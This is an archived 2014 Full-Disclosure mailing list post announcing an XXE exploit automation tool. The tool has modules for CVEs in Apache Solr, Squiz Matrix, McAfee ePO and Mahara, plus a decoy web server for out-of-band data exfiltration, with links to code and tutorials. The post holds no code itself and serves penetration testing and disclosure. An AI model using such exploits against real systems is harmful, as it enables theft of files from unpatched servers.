| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <539EA9DA.5090200@beneaththewaves.net> Date: Mon, 16 Jun 2014 01:24:58 -0700 From: "Ben Lincoln (F7EFC8C9)" <F7EFC8C9@...eaththewaves.net> To: fulldisclosure@...lists.org Subject: [FD] [Tool] XXE exploit automation - On The Outside, Reaching In 0.2 This has been my weekend project off and on since February. I would still consider it in a "preview" state, but I also think it's far enough along to be useful to at least a few people. The idea behind it is to use a Metasploit-style module system specifically for XXE exploit code. This allows a common interface, including the ability to automate downloads of numerous files, or automatically walk the directory structure if the vulnerable system is based on Java. This initial release includes a number of different modules for four different vulnerable software packages: CVE-2013-6407 - Apache Solr SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1 CVE-2014-2205 - McAfee ePolicy Orchestrator from 4.6.0 to 4.6.7 (without Hotfix 940148) CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 To my knowledge, this is the first public release of exploit code for CVE-2013-6407 and CVE-2012-2239. The Squiz Matrix and Mahara modules make use of On The Outside, Reaching In's co-conspirator She Wore A Mirrored Mask, which is an extremely lightweight webserver that pretends to be something innocuous (Apache Coyote 1.1 by default), but is actually used for Yunusov-Osipov-style out-of-band XXE data-exfiltration. Again, these are really early versions, and the code is a bit of a mess, but they do work very effectively, at least if you run them under Python 2.7.3. The code is GPLv3. Main pages: http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html http://www.beneaththewaves.net/Software/She_Wore_A_Mirrored_Mask.html In-depth tutorials: http://www.beneaththewaves.net/Software/OTORI_-_Example_1_Apache_Solr.html http://www.beneaththewaves.net/Software/OTORI_-_Example_2_Squiz_Matrix.html http://www.beneaththewaves.net/Software/OTORI_-_Example_3_Mahara.html http://www.beneaththewaves.net/Software/OTORI_-_Example_4_McAfee_ePO.html Feedback is appreciated, and if anyone is able to make good use of them in a pen-test, I'd love to hear about it. - Ben Lincoln _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists